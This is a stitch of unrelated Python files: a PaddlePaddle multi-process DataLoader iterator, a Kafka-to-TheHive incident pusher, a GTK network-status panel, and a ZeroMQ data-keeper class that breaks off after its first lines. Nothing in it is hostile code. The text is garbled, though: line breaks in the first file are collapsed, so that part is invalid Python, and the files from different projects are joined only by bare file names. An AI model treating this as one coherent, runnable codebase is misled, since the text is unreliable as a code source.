# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import six import sys import time import signal import numbers import logging import itertools import threading import numpy as np import multiprocessing from collections import namedtuple from paddle.fluid.framework import _set_expected_place, _current_expected_place, set_flags # NOTE: queue has a different name in python2 and python3 import queue import paddle from .. import core, layers from ..framework import in_dygraph_mode from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher from .batch_sampler import _InfiniteIterableSampler from .collate import default_collate_fn, default_convert_fn from .worker import ParentWatchDog, get_worker_info, _worker_loop, \ _DatasetKind, _IterableDatasetStopIteration, _WorkerException, \ _ResumeIteration from .flat import _flatten_batch, _restore_batch __all__ = ['get_worker_info'] # NOTE: fix `terminate called without an active exception` # if for loop break and program exit immediately(with no model # layers processing) after iterate **the first few data** in # distributed lauch mode, distributed launch will call # terminate() to kill main process on each devices, but thread # is still iterating to fullfill blocking queue caches, which # may cause thread error `terminate called without an active # exception` for 
terminate is a strong singal and `__del__` # of DataLoader may not be called, so we add a global link to # the last DataLoader instance to call `__del__` to clean up # resources # NOTE: cannot simply as `__del__` to CleanupFuncRegistrar, # for this will remain a link to each DataLoader instance in # global, and will precludes GC to auto collect DataLoader # instance and will cause memory leak _loader = None def _clear_loader(): global _loader if _loader is not None: try: _loader.__del__() del _loader except: pass CleanupFuncRegistrar.register(_clear_loader) class _DataLoaderIterBase(object): """ Iterator implement of DataLoader, will load and feed mini-batch data by setting in given dataloader. Args: loader(instance of DataLoader): instance of `fluid.io.DataLoader` """ def __init__(self, loader): self._dataset = loader.dataset self._feed_list = loader.feed_list or [] self._places = loader.places self._return_list = loader.return_list self._batch_sampler = loader.batch_sampler self._drop_last = loader.drop_last self._auto_collate_batch = loader.auto_collate_batch self._num_workers = loader.num_workers self._use_buffer_reader = loader.use_buffer_reader self._use_shared_memory = loader.use_shared_memory self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL self._worker_init_fn = loader.worker_init_fn self._dataset_kind = loader.dataset_kind self._pin_memory = loader.pin_memory self._sampler_iter = iter(self._index_sampler) if self._auto_collate_batch: self._collate_fn = loader.collate_fn or default_collate_fn else: self._collate_fn = loader.collate_fn or default_convert_fn # LoDTensorBlockingQueue instance for create_py_reader and a thread # to put mini-batch data to self._blocking_queue, mini-batch data # will be get from: # 1. multi-process mode: get data from workers' result queue # 2. 
single-process mode: read mini-batch data in main process self._blocking_queue = None self._thread = None self._thread_done_event = threading.Event() @property def _index_sampler(self): if self._auto_collate_batch: return self._batch_sampler else: if self._dataset_kind == _DatasetKind.MAP: return list(range(len(self._dataset))) else: return _InfiniteIterableSampler(self._dataset, 1) def __iter__(self): return self def __len__(self): return len(self._batch_sampler) def _exit_thread_expectedly(self): self._thread_done_event.set() if self._blocking_queue: self._blocking_queue.close() def _exit_thread_unexpectedly(self): self._thread_done_event.set() if self._blocking_queue: self._blocking_queue.kill() class _DataLoaderIterSingleProcess(_DataLoaderIterBase): """ Single process implement of DataLoaderIter, loading data from loader.data in main process """ def __init__(self, loader): super(_DataLoaderIterSingleProcess, self).__init__(loader) self._dataset_fetcher = _DatasetKind.create_fetcher( self._dataset_kind, self._dataset, self._auto_collate_batch, self._collate_fn, self._drop_last) # NOTE: _structrue_infos used to record the data structure of # batch to restore batch structure after reading Tensor # from blocking_queue in single-process mode. 
Note that # only single process is used in single-process mode, we # can record the data structure sequencely in a list without # recording the send and recv index self._structure_infos = [] # NOTE: len(self._places) batch data compose as an output # iteration, set blocking_queue can cache 2 iteration datas # at most here self._blocking_queue_capacity = 1 * len(self._places) self._init_thread() self._shutdown = False global _loader _loader = self def _init_thread(self): self._var_names = [v.name for v in self._feed_list] self._shapes = [v.shape for v in self._feed_list] self._dtypes = [v.dtype for v in self._feed_list] self._need_check_feed = [ v.desc.need_check_feed() for v in self._feed_list ] # if only 1 place, do not need to keep order self._blocking_queue = core.init_lod_tensor_blocking_queue( core.Variable(), self._blocking_queue_capacity, len(self._places) > 1) self._reader = core.create_py_reader( self._blocking_queue, self._var_names, self._shapes, self._dtypes, self._need_check_feed, self._places, self._use_buffer_reader, True, self._pin_memory) self._thread = threading.Thread( target=self._thread_loop, args=(_current_expected_place(), )) self._thread.daemon = True self._thread.start() def _thread_loop(self, legacy_expected_place): #NOTE(zhiqiu): Set the expected place for new thread as the same as father thread, # and it will call platform::SetDeviceId() in c++ internally. # If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0, # Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda # APIs in this thread. _set_expected_place(legacy_expected_place) # NOTE(chenweihang): [ Why need to set not to execute pten kernel here? 
] # Now, in order to ensure that the execution performance of the dynamic # graph mode in pten compatible state does not decline significantly, # we have adopted the approach of caching a KernelContext globally for # the dynamic graph tracer to reduce the construction and deconstruction # overhead of data interfaces such as the compatible state DenseTensor. # The static graph is each op caches a KernelContext, but the op of # the dynamic graph will be constructed and destroyed every round of # execution, so it is impossible to cache KernelContext for each op. # However, it is not thread-safe if using only one global kernel context in # dynamic graph. If the pten op of paddle is used in the DataLoader thread, # it may cause access errors. We temporarily do not execute pten kernel # in this scenario and will find a better solution later and remove # this setting. set_flags({'FLAGS_run_pten_kernel': False}) while not self._thread_done_event.is_set(): try: indices = next(self._sampler_iter) # read data from dataset in mini-batch # with paddle.fluid.dygraph.guard(place=paddle.CPUPlace()): # read data from dataset in mini-batch batch = self._dataset_fetcher.fetch(indices, self._thread_done_event) except StopIteration: self._exit_thread_expectedly() return if batch is None or self._thread_done_event.is_set(): break # flat batch and record structure infos batch, structure = _flatten_batch(batch) self._structure_infos.append(structure) if self._thread_done_event.is_set(): break try: # pack as LoDTensorArray array = core.LoDTensorArray() for slot in batch: if isinstance(slot, paddle.Tensor): slot = slot.value().get_tensor() elif not isinstance(slot, core.LoDTensor): tmp = core.LoDTensor() tmp.set(slot, core.CPUPlace()) slot = tmp array.append(slot) if self._thread_done_event.is_set(): break try: self._blocking_queue.push(array) except: self._exit_thread_expectedly() except: self._exit_thread_unexpectedly() six.reraise(*sys.exc_info()) self._exit_thread_expectedly() def 
__next__(self): try: if in_dygraph_mode(): data = self._reader.read_next_var_list() data = _restore_batch(data, self._structure_infos.pop(0)) else: if self._return_list: data = self._reader.read_next_list() for i in range(len(data)): data[i] = data[i]._move_to_list() data = [ _restore_batch(d, s) for d, s in zip(data, self._structure_infos[:len( self._places)]) ] self._structure_infos = self._structure_infos[len( self._places):] # static graph organized data on multi-device with list, if # place number is 1, there is only 1 device, extra the data # from list for devices to be compatible with dygraph mode if len(self._places) == 1: data = data[0] else: data = self._reader.read_next() return data except StopIteration: self._reader.shutdown() self._try_shutdown_all() six.reraise(*sys.exc_info()) def _shutdown_thread(self): if self._thread: self._thread_done_event.set() # NOTE: we wait for _thread exit for 3 seconds, if # thread not exit normally, force kill it for _ in range(3): if self._thread.is_alive(): time.sleep(1) else: break else: if self._thread is not threading.current_thread(): self._thread.join() self._thread = None # python2 compatibility def next(self): return self.__next__() def _try_shutdown_all(self): if not self._shutdown: try: # # _blocking_queue in keep order mode holds sub-threads # # need to release thread resources on unexpected exit if self._blocking_queue: self._blocking_queue.close() self._blocking_queue = None # NOTE: blocking queue should be closed firstly for # blocking queue read may hang and _thread_done_event # cannot be checked self._shutdown_thread() finally: self._shutdown = True def __del__(self): self._try_shutdown_all() class _DataLoaderIterMultiProcess(_DataLoaderIterBase): def __init__(self, loader): super(_DataLoaderIterMultiProcess, self).__init__(loader) self._persistent_workers = loader._persistent_workers self._resume_worker_cnt = 0 assert self._num_workers > 0, "Multi-process DataLoader " \ "invalid 
num_workers({})".format(self._num_workers)

        # subprocess wrokers' result queue
        self._data_queue = None

        # data get from _data_queue will be reordered by _rcvd_idx
        # for data order keeping, data index not equal _rcvd_idx
        # will be cached in _task_infos
        self._send_idx = 0
        self._rcvd_idx = 0
        self._batches_outstanding = 0
        self._task_infos = {}
        self._structure_infos = []

        # indices outstand as _outstanding_capacity at first, and
        # blocking_queue capacity is also _outstanding_capacity.
        # _outstanding_capacity here to make sure each indices_queue
        # has at least 2 indices, and outstanding batch cached
        # output data for at least 2 iterations(Note that len(_places)
        # batches will be composed as an iteration output)
        self._outstanding_capacity = 2 * max(self._num_workers,
                                             len(self._places))

        # see _try_put_indices
        self._thread_lock = threading.Lock()

        # init workers and indices queues and put 2 indices in each indices queue
        self._init_workers()
        for _ in range(self._outstanding_capacity):
            self._try_put_indices()

        self._init_thread()
        self._shutdown = False

    def _init_workers(self):
        """Spawn the worker subprocesses, one indices queue per worker, and
        the shared result queue / done events used to coordinate shutdown."""
        # multiprocess worker and indice queue list initial as empty
        self._workers = []
        self._worker_status = []
        self._indices_queues = []
        self._workers_idx_cycle = itertools.cycle(range(self._num_workers))

        # create data_queue for workers
        self._data_queue = multiprocessing.Queue()

        # event for workers and thread, thread event is only need
        # in multi-processing mode
        self._workers_done_event = multiprocessing.Event()
        self._thread_done_event = threading.Event()

        for i in range(self._num_workers):
            indices_queue = multiprocessing.Queue()
            self._indices_queues.append(indices_queue)
            worker = multiprocessing.Process(
                target=_worker_loop,
                args=(self._dataset, self._dataset_kind, indices_queue,
                      self._data_queue, self._workers_done_event,
                      self._auto_collate_batch, self._collate_fn,
                      self._drop_last, self._worker_init_fn, i,
                      self._num_workers, self._use_shared_memory))
            # daemonize so stray workers die with the main process
            worker.daemon = True
            worker.start()
            self._workers.append(worker)
            self._worker_status.append(True)

        core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
        _set_SIGCHLD_handler()

    def _clear_and_remove_data_queue(self):
        """Drain any leftover results and close the worker result queue."""
        if self._data_queue is not None:
            while True:
                try:
                    self._data_queue.get_nowait()
                except:
                    # NOTE(review): the bare except is deliberate here — it
                    # treats queue.Empty (and any other error) as "drained"
                    # and proceeds to close the queue; narrowing it would
                    # need confirmation against all failure modes of get_nowait.
                    self._data_queue.cancel_join_thread()
                    self._data_queue.close()
                    break

    def _init_thread(self):
        """Create the C++ blocking queue / py_reader pair and start the
        Python-side reader thread that feeds the blocking queue."""
        self._var_names = [v.name for v in self._feed_list]
        self._shapes = [v.shape for v in self._feed_list]
        self._dtypes = [v.dtype for v in self._feed_list]
        self._need_check_feed = [
            v.desc.need_check_feed() for v in self._feed_list
        ]
        # if only 1 place, do not need to keep order
        self._blocking_queue = core.init_lod_tensor_blocking_queue(
            core.Variable(), self._outstanding_capacity, len(self._places) > 1)
        self._reader = core.create_py_reader(
            self._blocking_queue, self._var_names, self._shapes, self._dtypes,
            self._need_check_feed, self._places, self._use_buffer_reader, True,
            self._pin_memory)

        self._thread_done_event = threading.Event()
        # thread event is only need in multi-processing mode
        self._thread = threading.Thread(
            target=self._thread_loop, args=(_current_expected_place(), ))
        self._thread.daemon = True
        self._thread.start()

    def _reset(self):
        """Resume persistent workers and reset all bookkeeping so iteration
        can restart for a new epoch without recreating workers or thread."""
        # resume iteration in following steps
        # 1. Resume workers, clear worker caches
        # put _ResumeIteration to all worker as resume iteration flag
        with self._thread_lock:
            self._resume_worker_cnt = self._num_workers
            for worker_id in range(self._num_workers):
                self._indices_queues[worker_id].put(_ResumeIteration())
                self._batches_outstanding += 1
        # all flag will be check in _thread_loop, simply wait here
        while self._resume_worker_cnt > 0:
            time.sleep(0.5)

        # 2. clear blocking_queue caches
        # in order not to restart the thread, we just clear
        # the blocking_queue cachees instead of recreating one
        while self._blocking_queue.size() >= len(self._places):
            if in_dygraph_mode():
                self._reader.read_next_var_list()
            elif self._return_list:
                self._reader.read_next_list()
            else:
                data = self._reader.read_next()

        # 3. reset all states
        self._send_idx = 0
        self._rcvd_idx = 0
        self._batches_outstanding = 0
        self._task_infos = {}
        self._structure_infos = []

        # set all worker status available
        self._worker_status = [True] * self._num_workers

        # 4. reset _sampler_iter and put prefetch indices to start next epoch
        # init workers and indices queues and put 2 indices in each indices queue
        self._sampler_iter = iter(self._index_sampler)
        for _ in range(self._outstanding_capacity):
            self._try_put_indices()

    def _shutdown_worker(self, worker_id, shutdown=False):
        """Ask one worker to exit by putting None on its indices queue.

        `shutdown=True` forces the signal even for persistent workers."""
        if self._worker_status[worker_id] or (self._persistent_workers and
                                              shutdown):
            self._indices_queues[worker_id].put(None)
            self._worker_status[worker_id] = False

    def _try_shutdown_all(self, timeout=None):
        """Stop the reader thread, all workers and their queues exactly once."""
        if not self._shutdown:
            try:
                self._exit_thread_expectedly()
                self._clear_and_remove_data_queue()

                # set _workers_done_event should be set before put None
                # to indices_queue, workers wll exit on reading None from
                # indices_queue
                self._workers_done_event.set()
                for i in range(self._num_workers):
                    self._shutdown_worker(i, shutdown=True)

                if not self._shutdown:
                    for w in self._workers:
                        w.join(timeout)
                    for q in self._indices_queues:
                        q.cancel_join_thread()
                        q.close()
            finally:
                core._erase_process_pids(id(self))
                self._shutdown = True

    def _thread_loop(self, legacy_expected_place):
        """Reader-thread body: repeatedly fetch a worker result via
        _get_data() and push it into the C++ blocking queue."""
        #NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
        # and it will call platform::SetDeviceId() in c++ internally.
        # If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
        # Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
        # APIs in this thread.
        _set_expected_place(legacy_expected_place)

        # NOTE(chenweihang): See Note [ Why need to set not to execute pten kernel here? ]
        set_flags({'FLAGS_run_pten_kernel': False})

        while not self._thread_done_event.is_set():
            batch = self._get_data()
            if not self._thread_done_event.is_set():
                if batch is None:
                    self._exit_thread_expectedly()
                else:
                    if isinstance(batch, _ResumeIteration):
                        assert self._resume_worker_cnt > 0
                        self._resume_worker_cnt -= 1
                        continue
                    try:
                        # pack as LoDTensorArray
                        array = core.LoDTensorArray()
                        if self._use_shared_memory:
                            for tensor in batch:
                                array.append(tensor)
                        else:
                            # LoDTensor not in shared memory is not
                            # serializable, cannot be create in workers
                            for slot in batch:
                                if isinstance(slot, paddle.Tensor):
                                    slot = slot.value().get_tensor()
                                elif not isinstance(slot, core.LoDTensor):
                                    tmp = core.LoDTensor()
                                    tmp.set(slot, core.CPUPlace())
                                    slot = tmp
                                array.append(slot)

                        if not self._blocking_queue.push(array):
                            self._blocking_queue.close()
                    except Exception as e:
                        self._exit_thread_unexpectedly()
                        six.reraise(*sys.exc_info())
                    finally:
                        # advance even on failure so _rcvd_idx stays in step
                        # with the batches taken off the result queue
                        self._rcvd_idx += 1

    def _get_data(self):
        """Fetch the next in-order batch from the worker result queue,
        caching out-of-order results in _task_infos; returns None when the
        data is drained (non-persistent mode)."""
        while not self._thread_done_event.is_set():
            # For IterableDataset, batch indices is generated infinitely
            # for each worker to raise StopIteration, but a StopIteration
            # raising process will discard a batch indices which is count
            # in _send_idx but will not increase _rcvd_idx, so we check
            # whether the worker is still alive here to skip the discarded
            # batch indices and increase _rcvd_idx
            if self._dataset_kind == _DatasetKind.ITER:
                while self._rcvd_idx < self._send_idx:
                    info = self._task_infos[self._rcvd_idx]
                    if len(info) == 3 or self._worker_status[info[0]]:
                        break
                    del self._task_infos[self._rcvd_idx]
                    self._rcvd_idx += 1
                    self._batches_outstanding -= 1
                else:
                    # NOTE: in persistent workers mode, do not check data
                    #       drained here, simply let it go to _data_queue
                    #       reading to get _ResumeIteration
                    if not self._persistent_workers:
                        # NOTE: _rcvd_idx and _send_idx only record batches among
                        #       workers, if batches among workers drained, there
                        #       may also be data in blocking queue
                        if self._batches_outstanding < len(self._places):
                            return None
                        continue

            if self._rcvd_idx in self._task_infos and \
                    len(self._task_infos[self._rcvd_idx]) == 3:
                info = self._task_infos.pop(self._rcvd_idx)
                self._structure_infos.append(info[2])
                return info[1]

            try:
                # [ avoid hang ]: main process may blocking at _reader.read_next when
                # KeyboardInterrupt, we do following tradeoff:
                # 1. get data with timeout, MP_STATUS_CHECK_INTERVAL(5s) as timeout
                #    default, if KeyboardInterrupt blocking, failed workers will be
                #    checked and raise RuntimeError to quit DataLoader in timeout
                #    exception handling.
                # 2. if get data timeout and check workers all alive, continue to
                #    get data again
                data = self._data_queue.get(timeout=self._timeout)
            except Exception as e:
                # check if thread done event set when waiting data
                if self._thread_done_event.is_set():
                    continue

                # check failed workers
                failed_workers = []
                for i, w in enumerate(self._workers):
                    if self._worker_status[i] and not w.is_alive():
                        failed_workers.append(w)
                        self._shutdown_worker(i)
                if len(failed_workers) > 0:
                    self._exit_thread_unexpectedly()
                    pids = ', '.join(str(w.pid) for w in failed_workers)
                    raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
                                       "pids: {}".format(len(failed_workers), pids))

                # get(timeout) will call _poll(timeout) and may raise IOError
                if isinstance(e, queue.Empty) or isinstance(e, IOError):
                    # continue on timeout to keep getting data from queue
                    continue

                self._exit_thread_unexpectedly()
                logging.error("DataLoader reader thread failed({}) to read data from " \
                              "workers' result queue.".format(e))
                six.reraise(*sys.exc_info())
            else:
                if self._dataset_kind == _DatasetKind.ITER and isinstance(
                        data, _IterableDatasetStopIteration):
                    # if a worker get StopIteraion, we shutdown this worker,
                    # note that this batch indices to trigger StopIteration
                    # is discard, outstanding batch number should be decrease
                    # and another indices should be put for other workers
                    # may still working.
                    if self._persistent_workers:
                        self._worker_status[data.worker_id] = False
                    else:
                        self._shutdown_worker(data.worker_id)
                        self._batches_outstanding -= 1
                    self._try_put_indices()
                    continue

                idx, batch, structure = data

                if isinstance(idx, _ResumeIteration) and batch is None \
                        and structure is None:
                    return idx

                if isinstance(batch, _WorkerException):
                    self._exit_thread_unexpectedly()
                    batch.reraise()

                if idx == self._rcvd_idx:
                    del self._task_infos[idx]
                    self._structure_infos.append(structure)
                    return batch
                else:
                    # out-of-order result: stash it until its turn comes
                    self._task_infos[idx] += (batch, structure)
                    continue

    def _try_put_indices(self):
        """Take the next batch of indices from the sampler and hand it to
        the next available worker; no-op when sampler or workers are done."""
        assert self._batches_outstanding <= self._outstanding_capacity, \
            "too many indices have been put to queue"
        # In multi-process mode for IterableDataset, _try_put_indices will
        # be called both in main process(for our implement has blocking queue,
        # and blocking queue read is in main process) and thread, which may
        # cause error following error
        # 1. "ValueError: generator already executing" in next(self._sampler_iter)
        # 2. re-enter in increase _send_idx
        # add a lock for threading save, for _try_put_indices is only a slight
        # function which is not in data reading pipeline, this lock almost no
        # influence on performance
        with self._thread_lock:
            try:
                indices = next(self._sampler_iter)
            except StopIteration:
                return

            # round-robin over workers, skipping ones already shut down
            for i in range(self._num_workers):
                worker_idx = next(self._workers_idx_cycle)
                if self._worker_status[worker_idx]:
                    break
            else:
                return

            self._indices_queues[worker_idx].put((self._send_idx, indices))
            self._task_infos[self._send_idx] = (worker_idx, )
            self._batches_outstanding += 1
            self._send_idx += 1

    def __del__(self):
        self._try_shutdown_all()

    def _shutdown_on_exit(self):
        # bounded join so interpreter exit is not blocked indefinitely
        self._try_shutdown_all(1)

    def __next__(self):
        """Return the next restored batch, or raise StopIteration when the
        dataset is drained (shutting everything down in non-persistent mode)."""
        try:
            # _batches_outstanding here record the total batch data number
            # in 'from after _try_put_indices to beforeoutput data', this
            # value should be _outstanding_capacity if data is not drained,
            # if _batches_outstanding is less than _places number, there are
            # no enough data to generate next output, close blocking_queue and
            # set _thread_done_event here, py_reader will raise StopIteration,
            # end workers and indices_queues in StopIteration handling
            if self._batches_outstanding < len(self._places):
                if self._persistent_workers:
                    raise StopIteration
                else:
                    self._thread_done_event.set()
                    self._blocking_queue.close()

            if in_dygraph_mode():
                data = self._reader.read_next_var_list()
                data = _restore_batch(data, self._structure_infos.pop(0))
            else:
                if self._return_list:
                    data = self._reader.read_next_list()
                    for i in range(len(data)):
                        data[i] = data[i]._move_to_list()
                    data = [
                        _restore_batch(d, s)
                        for d, s in zip(data, self._structure_infos[:len(
                            self._places)])
                    ]
                    self._structure_infos = self._structure_infos[len(
                        self._places):]
                    # static graph organized data on multi-device with list, if
                    # place number is 1, there is only 1 device, extra the data
                    # from list for devices to be compatible with dygraph mode
                    if len(self._places) == 1:
                        data = data[0]
                else:
                    data = self._reader.read_next()
            self._on_output_batch()
            return data
        except StopIteration:
            if not self._persistent_workers:
                self._reader.shutdown()
                self._try_shutdown_all()
            six.reraise(*sys.exc_info())

    # python2 compatibility
    def next(self):
        return self.__next__()

    def _on_output_batch(self):
        """Account for one iteration's output and refill the indices queues."""
        for _ in range(len(self._places)):
            self._batches_outstanding -= 1
            self._try_put_indices()
main.py
import logging
import os
import sys
import threading

from appmetrics import metrics
from socutils import get_settings

from modules.app_metrics import register_app_metrics
from modules.logging import prepare_logging

logger = logging.getLogger('thehive_incidents_pusher')


def main(settings_file_path: str = 'data/settings.yaml'):
    """Run the TheHive incidents pusher.

    Loads settings (path overridable via the APP_CONFIG_PATH environment
    variable), wires up the pusher and the Kafka consumer, starts the
    metrics webserver in a daemon thread, then pushes every consumed
    message to TheHive, committing the Kafka offset only after a
    successful push.

    Exit codes: 0 on interruption / exhausted topic, 1 on a processing
    error, 42 on any other fatal condition.
    """
    settings_file_path = os.getenv("APP_CONFIG_PATH", settings_file_path)
    settings = get_settings(settings_file_path)
    prepare_logging(settings)
    register_app_metrics()
    logger.info("Application start")
    logger.info("Load config from %s", settings_file_path)

    # Imported lazily so logging is configured before these modules'
    # import-time side effects run.
    from modules.pusher import TheHivePusher
    pusher = TheHivePusher(settings['thehive'], settings['hbase_event_loader'])

    from modules.kafka_consumer import prepare_consumer
    consumer = prepare_consumer(settings)
    consumer.create_consumer()

    from modules.app_metrics import run_metrics_webserver
    metrics_thread = threading.Thread(target=run_metrics_webserver, daemon=True)
    metrics_thread.start()

    try:
        for message in consumer.read_topic():
            logger.info("Read message from topic %s: %s",
                        message.topic, str(message.value))
            metrics.notify('received_kafka_messages', 1)
            pusher.push(message.value)
            logger.info("Successfully processed message")
            # Commit only after a successful push so a failed message is
            # redelivered on restart.
            consumer.consumer.commit()
    # BUG FIX: this handler must come before `except Exception`. In the
    # original order, StopIteration (a subclass of Exception) could never
    # reach this branch, so topic exhaustion exited with code 1 instead of 0.
    except (KeyboardInterrupt, StopIteration) as err:
        logger.warning("Unexpected processing interruption: %s", str(err))
        sys.exit(0)
    except Exception as err:
        logger.error("Exception, which type is %s, is detecting during consuming messages: %s",
                     type(err), str(err))
        sys.exit(1)
    except BaseException as e:
        logger.error("Some wtf shit is happened: %s", str(e))
        sys.exit(42)


if __name__ == '__main__':
    main()
gui.py
import cairo
import gi
import threading
import time

gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')

from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository.GdkPixbuf import Pixbuf, InterpType

from sand.gui_module import GUIComponent
from sand.modules.network.sensor import NetworkDevices, NetworkDeviceIO

import os
import pkg_resources


class SandNetworkGui(GUIComponent):
    """GTK panel that shows the connection status (icon + colored label) of
    the ethernet and wifi interfaces listed in the module configuration."""

    def __init__(self, configuration="configuration.yaml"):
        GUIComponent.__init__(self, "{}/{}".format(__package__, configuration))
        self._network_devices = NetworkDevices()
        self._network_devices.read()
        stat_script = pkg_resources.resource_filename(__name__, self.configuration["statistics-script"])
        self._network_io = NetworkDeviceIO(self._network_devices.data, stat_script)
        # One status label / icon widget per interface, filled in by the
        # _build_* methods. NOTE(review): only ethernet interfaces are
        # pre-seeded here; wifi entries are added lazily in _build_wifi_gui.
        self._labels_interfaces_status = dict()
        self._images_interfaces_status = dict()
        for interface in self.configuration["interfaces"]["ethernet"]:
            self._labels_interfaces_status[interface] = None
            self._images_interfaces_status[interface] = None
        # Vertical layout cursor advanced as widgets are placed.
        self.current_drawing_offset = self.configuration["start-drawing-offset"]
        self._module_color = "#{}".format(self.configuration["module-color"])
        self._thread_refresh = None

    def create_icon(self):
        """Place the module title label and the module icon on the layout."""
        label_description = Gtk.Label()
        label_description.set_markup("<span foreground='{}'><i><big><b>{}</b></big></i></span>".format(self._module_color, self.configuration["description"]))
        self.layout.put(label_description, self.configuration["description-position-x"], self.configuration["description-position-y"])
        image = Gtk.Image()
        icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["icon-filename"])
        pixbuf = Pixbuf.new_from_file(icon_filepath)
        image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["icon-dimension-x"], self.configuration["icon-dimension-y"], InterpType.BILINEAR))
        self.layout.put(image, self.configuration["icon-position-x"], self.configuration["icon-position-y"])

    def build(self):
        """Build the full widget tree and start the background refresh thread."""
        self.create_icon()
        self._build_ethernet_gui()
        self._build_wifi_gui()
        self._thread_refresh = threading.Thread(target=self.refresh, args=())
        # NOTE(review): setDaemon() is deprecated in favour of the
        # `daemon` attribute/constructor argument.
        self._thread_refresh.setDaemon(True)
        self._thread_refresh.start()

    def _build_ethernet_gui(self):
        """Create an icon + status label for each configured ethernet
        interface that is present on the system."""
        system_devices = self._network_devices.read()
        for interface in self.configuration["interfaces"]["ethernet"]:
            if interface in system_devices:
                status = system_devices[interface]
                label = Gtk.Label()
                self._set_ethernet_status(interface, status)
                # Disconnected interfaces get the configured warning color.
                if "disconnected" in status.lower():
                    label.set_markup("<span foreground='{}'><i><b>{} : </b></i></span><span foreground='#{}'><b>{}</b></span>".format(self._module_color, interface, self.configuration["disconnection-color"], status))
                else:
                    label.set_markup("<span foreground='{}'><i><b>{} : </b></i><b>{}</b></span>".format(self._module_color, interface, status))
                self.layout.put(label, self.configuration["left-padding-interface-status"]+self.configuration["interface-status-dimension-x"]+5, self.current_drawing_offset + int(self.configuration["interface-status-dimension-y"]/6))
                self.current_drawing_offset += self.configuration["horizontal-spacing"]
                self.current_drawing_offset += self.configuration["interface-status-dimension-x"]-10
                self._labels_interfaces_status[interface] = label

    def _set_ethernet_status(self, inteface, status):
        """Place the up/down ethernet icon for an interface.

        NOTE(review): parameter name `inteface` is a typo for `interface`
        (kept as-is; callers pass positionally)."""
        image = Gtk.Image()
        if "disconnected" in status.lower():
            icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["ethernet-down-icon-filename"])
        else:
            icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["ethernet-up-icon-filename"])
        pixbuf = Pixbuf.new_from_file(icon_filepath)
        image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["interface-status-dimension-x"], self.configuration["interface-status-dimension-y"], InterpType.BILINEAR))
        self.layout.put(image, self.configuration["left-padding-interface-status"], self.current_drawing_offset)
        self._images_interfaces_status[inteface] = image

    def _set_wifi_status(self, inteface, status):
        """Place the up/down wifi icon for an interface (same shape as
        _set_ethernet_status, wifi icon set)."""
        image = Gtk.Image()
        if "disconnected" in status.lower():
            icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["wifi-down-icon-filename"])
        else:
            icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["wifi-up-icon-filename"])
        pixbuf = Pixbuf.new_from_file(icon_filepath)
        image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["interface-status-dimension-x"], self.configuration["interface-status-dimension-y"], InterpType.BILINEAR))
        self.layout.put(image, self.configuration["left-padding-interface-status"], self.current_drawing_offset)
        self._images_interfaces_status[inteface] = image

    def _build_wifi_gui(self):
        """Create an icon + status label for each configured wifi interface
        that is present on the system.

        NOTE(review): unlike the ethernet variant, the disconnected color
        is hard-coded ('#0003d1') instead of read from configuration —
        confirm whether that is intentional."""
        system_devices = self._network_devices.read()
        for interface in self.configuration["interfaces"]["wifi"]:
            if interface in system_devices:
                status = system_devices[interface]
                label = Gtk.Label()
                self._set_wifi_status(interface, status)
                if "disconnected" in status.lower():
                    label.set_markup("<span foreground='{}'><i><b>{} : </b></i></span><span foreground='#0003d1'><b>{}</b></span>".format(self._module_color, interface, status))
                else:
                    label.set_markup("<span foreground='{}'><i><b>{} : </b></i><b>{}</b></span>".format(self._module_color, interface, status))
                self.layout.put(label, self.configuration["left-padding-interface-status"]+self.configuration["interface-status-dimension-x"]+5, self.current_drawing_offset + int(self.configuration["interface-status-dimension-y"]/6))
                self.current_drawing_offset += self.configuration["horizontal-spacing"]
                self.current_drawing_offset += self.configuration["interface-status-dimension-x"]-10
                self._labels_interfaces_status[interface] = label

    def refresh(self):
        """Background loop meant to refresh the interface widgets.

        NOTE(review): as visible here it only sleeps — the actual update
        logic appears to be missing or truncated; confirm against upstream.
        """
        while True:
            time.sleep(self.configuration["refresh-time"])
dk.py
# -*- coding: utf-8 -*-
"""
Created on Sat Mar  7 13:07:34 2020

@author: somar
"""
import zmq
import os
import time
from multiprocessing import Process

# Endpoint prefixes; the port number is appended at connect/bind time.
connectionPort = "tcp://192.168.195.156:"
masterport = "tcp://127.0.0.1:"


class DataKeeper:
    """A storage node that accepts file uploads/downloads from clients and
    serves replication requests coming from the master."""

    # Port the master listens on for keeper heartbeats.
    i_Am_Alive_port = "5400"
    # Port used to receive replication requests from the master.
    replicationPort = "5200"
    # NOTE(review): a single zmq.Context shared as a class attribute; each
    # spawned Process gets its own copy on import, so this is fine for
    # processes but would not be safe across threads.
    context = zmq.Context()

    def __init__(self, ID, port):
        self.ID = ID
        self.clientport = port
        # Derive the port used to report success to the master by bumping
        # the tens digit of the client port (e.g. "5510" -> "5520").
        # TODO(review): confirm this scheme matches the master's expectation.
        self.mastersuccessport = port[:-2] + str(int(port[-2]) + 1) + port[-1]

    def HeartBeat(self):
        """Publish an 'I am alive' message to the master every 0.5 seconds."""
        socket = self.context.socket(zmq.PUB)
